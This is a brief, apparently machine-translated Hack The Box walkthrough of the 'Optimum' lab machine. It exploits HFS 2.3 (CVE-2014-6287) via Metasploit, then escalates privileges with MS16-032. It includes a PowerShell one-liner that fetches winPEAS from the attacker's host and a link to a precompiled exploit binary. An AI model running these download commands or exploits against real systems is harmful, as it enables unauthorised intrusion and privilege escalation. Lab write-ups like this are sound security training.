[Hack The Box] Target Drone 8 Optimum

insert image description here
nmap directly opened the leak scan, found cve-2011-3192, useless, open port 80, go and see
insert image description here
insert image description here

Open is HFS, and nmap scans it out to be HFS2.3
insert image description here
This version of HFS has cve
https://nvd.nist.gov/vuln/detail/CVE-2014-6287
insert image description here
msf has this module ,
insert image description here
directly take down the shell
insert image description here
and get the user. txt
insert image description here
cannot enter admin, you need to
insert image description here
escalate privileges. Start a python service locally and upload winpeas

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:8000/winPEASx64.exe', '.\winPEASx64.exe')"


It seems that there is no information.
Use Windows-Exploit-Suggester to test the patch
systeminfo and get the system information
insert image description here

If you find a lot, let’s take MS16-032 here.
insert image description here
Find a payload
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe and upload it for
execution, and get it successfully arrive
insert image description here

Guess you like

Origin blog.csdn.net/m0_51078229/article/details/123888185